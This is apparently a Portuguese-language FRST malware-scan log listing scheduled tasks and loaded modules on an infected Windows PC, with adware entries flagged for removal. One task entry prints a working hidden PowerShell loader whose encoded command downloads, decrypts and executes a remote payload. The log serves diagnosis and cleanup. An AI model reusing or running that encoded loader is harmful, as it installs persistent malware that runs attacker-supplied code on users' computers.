Task: {4A5F4C5A-AEAF-4E30-910A-0547FB879C9E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-21] (Google Inc.)
Task: {4F30F091-6DCB-492E-9EB9-9727C64738D1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-21] (Google Inc.)
Task: {57C71130-A89F-470B-896E-938C4E93DB5C} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {5948CF5B-25E0-43F1-9440-DC6E2E98ACB7} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {5C58FE79-832B-46F5-8698-B76A501A9B01} - System32\Tasks\{C9F78E47-73C5-4464-85A9-F349830D5225} => pcalua.exe -a C:\Users\Maollo\AppData\Roaming\istartpageing\UninstallManager.exe -c -ptid=cmi
Task: {5F9D2E28-00DB-4B06-A6A5-1116A23AC453} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {65757409-7571-4EAB-9D03-1AEF4A86EBAD} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {66E5372C-E24B-44A5-830A-2342535BF35B} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {670F50F7-2BFE-4F76-9E2F-4B930786A40B} - System32\Tasks\{2DEA0299-761D-49B0-B1A6-C4BEE02CC1CA} => pcalua.exe -a C:\Users\Maollo\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face
Task: {6AE418DB-C758-4A41-96CF-3E7BBF51CB8D} - \ShopperPro3 -> Nenhum Arquivo <==== ATENÇÃO
Task: {6FCC5CE2-36DE-4798-A1CC-77102F97AE2C} - \DriverToolkit Autorun -> Nenhum Arquivo <==== ATENÇÃO
Task: {7238B8B4-7C5B-4C4F-95E2-0A7AFC2ED94E} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {74A1C236-5E52-434B-BBDE-1390CC19C7FC} - System32\Tasks\SpeedUpMyPC Startup => C:\Program Files (x86)\Uniblue\SpeedUpMyPC\speedupmypc.exe <==== ATENÇÃO
Task: {74F8DD19-C674-481F-8982-046D6B6F8D4E} - \Varredura ByteFence -> Nenhum Arquivo <==== ATENÇÃO
Task: {75B5BE22-1C42-42DE-93D7-9B3AEFB0C75A} - System32\Tasks\{0E7F0E47-790E-0908-0F11-0C790E0E110E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGMAQwBqADgARwBxAFMAYwBFAGUAeQAxAFcARABSAEcAbQBjAGYAXwA1AG8AZQAyADQAWAA3AG4AeAAyAGcAWgBVAGEAQgBTAHcANwBRAEcAXwBwAGUAYQBTAHIATQBvAEIASgB4AGoAeAA1AHQAbAB6AHQAdwAyAHoASgAyAGIANQBhAG8ARQBLAEoAZQBxAHAAUwBqAEgAMwBOAEoAegBDAHgAUABVADEARwB5AG0ARgBTAFkASgB1AFMAbQB2ADYAWABpAFAAdABqAFkARwBSADMAQgAtAHUANgAyAEsAeQBEAGgAeQBNAF8AbwA2AHcAeABIADcARwBjAEEATQByAEkAYQBGAFQARwB3AG8AbwBJAC0AMAA2AGYAUgB5AF8AYgA4AHUAOABuADgASABXAHQAbgBOAFEAQQBGAEcAeABFAFcATQA2AFMAUgBiAG0AZwBfADQASgBrAEQALQBGAFAANAAxAGIASQBhAFcAVgBrADgALQBSAHcAaQBWAHEAbwBYADQARgB4ADUAVwBHAHcASABBAEkAaABTAC0AYwBGAE4AUwBVADUAYQAtADIAYgBmAG8AQQA3AFYAMQBoAFUAVABZAFcALQBQAGcASABMAE8ATQBiAGQAUQAtADIAbQB5ADIASABNAFAASgBmAGsAZgBzAGQAVwB1AFUANAB5ADYAaABIAGgAVQBQAHkAbQBwAHUAMgBtAG8ATABnAGYASQBRAFcAUQBGAEQATgAyAFMAVwBuAGEAbQBKAFkAbwAzAFMAQwBJADAANgAzAHEAcQBrADEAVwBtADEATABmAGIASABUAHMAYQB6AHEARgBkAFMANgBZAEUAawBXAHQAYwB0AFUAOQByAGEAbwBFAGYAZwBhAFAAXwB4AF8ASgBpADgAVwBXAGEAdgBHAE4ARgBMAFMAWgAwAHMARAA0AFgATwBtAFAAagBtAG8AbQBmAGQARABLAFUAbQBzAEcAYwBpAGsATwA4AEEAegBYAEYAegBZAFUALQBYAG8AMAA1AGgAZgAtAHoANgBFAE4AbwA1AGIALQBFAEEAbwB5AGIAdABfADYAawBaAGwASwBBAGoANwAxADEAUwBBADMAYgA2AC0ATQBVAE4AVAA3AEMAbgBZAHAAZABOAFgAegBQAE0AMwAyAGcARQBSAGIAaAAzAG4AMgBtAGcAWABBAHgAMQBjAHYAVQBVAHgAMQBCAF8ATwBkADIATgBUAGkAMwBnAEkASQBiAEkARwBfAHMAQgA2AHEARgBXADUANQBjAF8AUABVADAARQA4ADQAdwBFAHQAQQB3AFgAZwAzAFIAWABpAFoAVQBOAFIAOQBqAHgAYgB2AEgATABDAHkAawA2AGMARgBEADQATQA0AGsAcAAyAFIAUgB0AGYARwBIADkAZgA2AEMARgA4AHIAVgBCAF8ARwBXAGkAcgAyADkAQgA0AEIAeABOAHgAUQBRAE0AawBBAHoAaQBDAHkASgBnAFgAZABGAFEAWQBNAFoAZwBCAHcAagBLAGsAOABzAF8AQgBYAHgAawByAFIAZgBiAC0AVwBDAFAAXwBOAC0AbABrAEIAWAB2AEgAWABxAEMAdgA3ADUAWQA5AFcANQBZAGMAZwBYADgATwBQAFoARwB1AEMAMQBjAFUARQBKAEEAMgBiADIAUABhAFUAVgBIADIARwBHAHcAWgBsAG8AbwBEAGQAUgBaAE4AWQBJAGsAZwB0AEwALQBxADAANgBHAHAAdABfADcATABoAFAASQBLAG4AQwB4AFMAMwB0AEUANwA1AEQAbABrAHEAdwBQAFAAbQBVADEAVABjADcAcABVAC0AWgBLAHEATgA0AGoAWgAzAFAAQwBWAG4AYQBMAEMARwBpAFcAWQBxAG4AQgBpADUAUQBSAGMASQBFAHAAUwB5AG8AbAB3AE0AdwB2AG4AUQBWAGgASwBOAGwAeABXAEcASwBMAFkATgBJADMAbQB3AGEAagBjAG4AegBmAFEAUgAwAHkAOQBOAFoALQBzAFQAWQA4AHcAdwB3AGQANgB1AFYAcAAyAEsAMAB1AE8AagBpAHUANAB2AGoAYwBHAFMANAAyAE4AcAA2AHkANQBUAEMAdwBNAFQAUQBaAHgAYQBtAHUAbwBBAG8AcQBqAGwAdABBADQAYgBQAEYASQBZAHcAbwBxAFQAbgByAHUAMABFAFgAZAA2AEgAeQBXAGwAVQA2AG4ARQBGADQAagBkADMAOQB5AFEALQBkADgALQBKAEMAYgBUAFEAYgBJAHQAZwBpADEAVQBuAFgANAByAEQAMABkAGsATQBtADIAWQBLAFEAdgA1AHoASwBNAFoAYQBPAFEAdAA4AGMAeQBhAHoANQBSAGoAUABuADMAQwAmAGMAPQA4ADAASwBtADQAdwByAHcAWgB4AHYAegBYAEsAZwAzAEQAQwA3AEcAbQAyAGQAZABMAHcASABwAG0AcAB4ADcASABJAE8ANgA0AHYAOAAzAGgAQQBtAHUAYgBtAF8AagA1AG8ATwBzADkANABaAFcAcABkADQAYQBSAG4AawBKAGoAYwAtAEMAVABWAGoAUAB2AGwAaABtAHkATABiAHQANQBMAFIAdwBkAGIAVABIAFkAawBGAEgANABGAFoAegBiAEQATAB3AFIANgA1AFoAUQBNAEUAQwBKAHYAcQBpAFkAQQAzAHoASwBWAEoAWgBtAHQASgA3AEIAYQBIAGEAZQAyAFUAcABoAFMANgBKAFQATwBQADIANgBYADIAUABlADIAcAAzAFoAMAB1AHgAMgB3AFoAMQBJAFMAMwBEAFYANAA5ADkARQBqAHoAWABGAGIAQQBQAFYATQByAGQAbABhAHAAZwBpAEQAQgBoAHQAdAAwAC0ALQBrAEIAcwBCADkAYQAyAHEAWgAwADgAcgB6AHgASwBKADMAbQBUAGEAVQBpAGkAQgBPAEcATgBUAGUAMQBSAFoAVgAwAEcAaABSAGgASQBSAFgARgBsAHIAcABwADUAcAB3AEIAZQBJAC0AMwBYAHcAeABSAFYATAAxAEMAbAA2AGMAdgBWAHgANQBRAGoATgBXAFMASQBTAGwAcgBqADIAYgB1AFYAbQAtAEwAZABuAFYAOQBmAHYAMwBHAHMASwBUAHUATQBsADUAagBIAEQARQBLAFMARwB2AGMAYgAzAE8ARgA5AHUAVwA1AEoAQQBmAHYARgBKAFEAdgAyAGgAVgBHAEkAeQBpAGYAVgBQAFIAbwBtAGMAegAxAGEARgBEADgASwBFAHkAbwBHAHgAagA5ADIAOAA4AGEAVABCAEcAdwBDAEgAUQBiAFgAcABNAHoAYwB2AHUAbwB0AEkAVABrAFcAUwBqAGsAdgByAG8ANABGADkAeQBHAG0AbwAxADIAaQBrAFEAWgAwADQAXwAzADIAcAB6AE8ATQByADIAOABpAE8AWgA5AGgATgBaAGQAUQBuAEkAZQB6ADgAbABCAEIAawBDADcANwBvAGgAYwBSAEMAUgAwAFYAdgBhAHEAeABTAGcAWgBVAHcAWQBDAFUAagBxAFMAVgBFADIAUwBWAGkASgBCAGYAbQBvADYAYgBJAEIAUAB5AFUAOQBiAFcAQQA3AGcASgAyAFEAdgAyADQAXwBlAEkAdABEAEwAUQBRAE0AcABrAEEAeQBLAGgAMABaADAARwBaAG8AQwBsADYAZABGAEoALQByAHYANwBKAC0AbgBqAEEAVQB5ADgAagA2AHUATwBEAEQANwBFAFgAMwBzAE4AVABvAGUASQBiAEQAbQA4AFAAQQA3AGwAUABJADcAZwBFAFUARwBRAEEAcAB2ADMAcgBiAHIAUABIAHQAMQA2ADQAUwBoADcAYgBTAEoAeQBxAFQARQBuAFQARQA1AHUAZQB6AHUARQBhAF8AZABnAEEAeQBlAHUAbABhAGwAcwBJAHgAVgByAHMAQwBqAHAAZABKAEUASgAzAFoATABBAHEAcwB6AEsAWQA0ADgAZgBaAHgAeABCAFoAdwBUAHIANgB2AEEAQwBNAEIAYwA2ADkAQgBHAEUAcgB0AGUAYQB2AFkAVwBoAHoAZgBrAGMANAA4ADAAWgBmAGsAMwBEAEUATwA5ADIAUgBmAGYAOABHAG0ANQAxAGUASABEAFcAOABqAHcAMQAyAEUAbQBKAHMAVAB5AFYAdgBlAG8AbQBTAEUAMgBsAFEANgBCAGkATQB0AHIAXwBEAHAANABiAEkAcABKAGoAMgBoAEcANABEAEUARgBKAGoASAB5AEEASQBZAF8ATwAyADIAUQB6AEgAbgBGADQASQBvADUANQBTADAAQwBzADYAYQBqAEsAdwBUAHoAUwBtADEAVwBwAHAATAB1ADIAYgA4AG8ANgAwAEcASABxAFoALQBGAG8ASwAwADEAaABXAGkAegBRAG0ANQBTADMAMQAtAFgAZwBTAEgATABjADAASQBGAHAAaABHAEgAOQBlAE4AbAB6AEkAcABQADUANgBWAHUAbABaAFkAWABUAHoAUgA4AG4AawA3AHAAaABfAGIAaAAzADcAbwBEAFQAUAB6AFkAaABRADcAZABnAEsAaQAwAHkAUAAyAHgAegBnAEUAMABuAGIAdgA0AEEASQAtAEoANwBwAGwAcABOAFUARwBOAFEAWQBzAE8AZABMAFEAYgAxADAAWABzAFAAVQBYAGkAOAB3AHkAcABKAHQAUgBQAEIAagAxADQAWABuAE0AbwBjAEMAagBGAG0AZAB3AC0AWgA3ADEAYQBWAHQAZABDAEEAagBIAHMAQwBqAHUASgB1ACYAcgA9ADYAMgAyADUANgAzADEANwA4ADgANgA1ADgAMgAwADgAMQAzADkAIgA7ACQAcwB0AHMAawA9ACIAewAwAEUANwBGADAARQA0ADcALQA3ADkAMABFAC0AMAA5ADAAOAAtADAARgAxADEALQAwAEMANwA5ADAARQAwAEUAMQAxADAARQB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAEUASwBOAFIAUQBEAEQARAAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {8CD90AB7-3EC2-460D-841E-6FB4E152AD44} - System32\Tasks\{A9840AB3-C8AC-45B3-AA06-90787B2340A0} => pcalua.exe -a C:\ProgramData\WebShield\uninstall.exe -c /kb=y /ic=1
Task: {8DB755BE-CB86-4DA0-9411-D3E045DA2D69} - System32\Tasks\SpeedUpMyPC Maintenance => C:\Program Files (x86)\Uniblue\SpeedUpMyPC\speedupmypc.exe <==== ATENÇÃO
Task: {911BC430-8073-4008-A838-4D5F078AC245} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {913A066F-CF6A-42EB-AED2-AAF73676EF07} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {94C6D46C-32AB-4E3F-8FCD-1872520E868E} - \YTDownloader -> Nenhum Arquivo <==== ATENÇÃO
Task: {9CA240A6-14DC-4AEA-BA8A-0B6BB6D685A0} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2016-01-20] (Overwolf LTD)
Task: {A5E5357E-4CEF-4724-9E67-E1F8C6F1F160} - \svchost -> Nenhum Arquivo <==== ATENÇÃO
Task: {ACB3F477-663F-426C-995B-10CB80723D7D} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {AEA5AE40-2F28-4297-BE6A-930997293C38} - System32\Tasks\update-S-1-5-21-2840682155-2406404488-1448223199-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] ()
Task: {B134AD5C-2C0A-4A3A-B799-7617ACAEBA18} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {B9478192-6F43-4D79-9180-E84DF8F6B88C} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
Task: {C2DA11FC-25B7-481B-9E89-8C22633B5D4A} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {C6F759A2-2FB6-4AC4-B1EE-E77AEB7A95C0} - System32\Tasks\{2A75E130-E0AE-40d1-B479-E583A0419691} => C:\Program Files (x86)\updateservice\updateservice.exe [2016-01-20] ()
Task: {CA9DE1D8-2B97-44FC-BDAA-913D2D1605E8} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {CFF1BD3E-7D4E-41EC-9A6F-1D765C069F84} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {D721F0A2-E92D-46FE-9314-351732258B89} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {DAFDA9FC-B24A-401D-BA43-66EB781345AB} - \ByteFence -> Nenhum Arquivo <==== ATENÇÃO
Task: {DB9A2CEE-1D64-46EB-BAA6-D078A5736966} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {E43B6080-1FCF-44E9-AA73-0B116FCA9E11} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {E9695163-E9C1-4F0D-90B8-6D1093973577} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Nenhum Arquivo <==== ATENÇÃO
Task: {EEBC4C79-46EA-4326-BD61-F83DFB30EDA1} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Nenhum Arquivo <==== ATENÇÃO
Task: {EF9C6595-D718-44D4-AE9F-F1D78B92C5AC} - System32\Tasks\HPCustParticipation HP Deskjet 2050 J510 series => C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\HPCustPartic.exe [2012-10-02] (Hewlett-Packard Co.)
Task: {F5B6289A-B349-4B79-9A3B-8801F64C2191} - \Pritc -> Nenhum Arquivo <==== ATENÇÃO
Task: {F8569DBF-E336-4EF1-8805-CC298EDF6CFE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {F8788B93-8AA2-4169-80BD-C79AB6C0196B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {FCD5B1E4-4B57-436C-801C-BE81FB1F2A86} - \YTDownloaderUpd -> Nenhum Arquivo <==== ATENÇÃO
Task: {FE9C5073-7E53-494E-AB3E-C113A6433D69} - System32\Tasks\PFExe => C:\WINDOWS\system32\config\systemprofile\AppData\Local\PriceFountain\pricefountain.exe <==== ATENÇÃO
Task: {FEBA3D40-5CFC-4FEC-ABA0-8E9080C47DEB} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-10] (Microsoft Corporation)
Task: {FF832CDD-1F93-4270-9F98-B2653A446B8F} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\WINDOWS\Tasks\Launch 4540.job => C:\Program Files (x86)\YTDownloader\YTDownloader.exe <==== ATENÇÃO
Task: C:\WINDOWS\Tasks\SpeedUpMyPC Startup.job => C:\Program Files (x86)\Uniblue\SpeedUpMyPC\speedupmypc.exe <==== ATENÇÃO
Task: C:\WINDOWS\Tasks\{2A75E130-E0AE-40d1-B479-E583A0419691}.job => C:\Program Files (x86)\updateservice\updateservice.exe

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

==================== Módulos Carregados (Whitelisted) ==============

2015-12-31 14:05 - 2015-12-31 13:51 - 00768352 _____ () C:\Windows\system32\Dileiho64.dll
2015-10-30 05:18 - 2015-10-30 05:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-01-06 15:14 - 2016-01-06 15:14 - 02653816 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-01-06 15:14 - 2016-01-06 15:14 - 02653816 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-01-05 21:15 - 2015-12-11 00:07 - 00613968 _____ () C:\Program Files (x86)\360\Total Security\MenuEx64.dll
2016-02-11 10:34 - 2016-02-11 10:34 - 02364928 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_launcher\releases\0.0.1.10\deploy\LoLLauncher.exe
2016-02-11 10:34 - 2016-02-11 10:34 - 04287488 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_patcher\releases\0.0.0.50\deploy\LoLPatcher.exe
2015-11-02 15:14 - 2015-11-02 15:14 - 00074752 _____ () C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.186\deploy\LolClient.exe
2016-02-05 22:41 - 2016-02-11 10:21 - 00662952 _____ () C:\Program Files (x86)\Primary Color\updatePrimaryColor.exe
2016-01-06 15:14 - 2016-01-06 15:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-01-06 15:14 - 2016-01-06 15:14 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-22 11:17 - 2016-01-22 13:44 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-02-03 22:11 - 2016-02-03 22:12 - 00417792 _____ () c:\windows\nci.exe
2016-02-03 22:12 - 2016-02-03 22:12 - 00408576 _____ () c:\windows\mnci.exe
2016-01-16 13:21 - 2016-01-04 23:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-16 13:21 - 2016-01-04 23:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-28 13:21 - 2016-01-16 03:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-28 13:21 - 2016-01-16 03:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-02-05 19:14 - 2016-02-11 11:14 - 00662952 _____ () C:\Program Files (x86)\Primary Color\bin\utilPrimaryColor.exe
2016-02-05 22:42 - 2016-02-11 02:37 - 00115112 _____ () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.expext.exe
2016-02-05 22:42 - 2016-02-11 02:38 - 00353192 _____ () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.PurBrowse64.exe
2016-02-05 22:42 - 2016-02-11 08:37 - 00107944 _____ () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter.exe
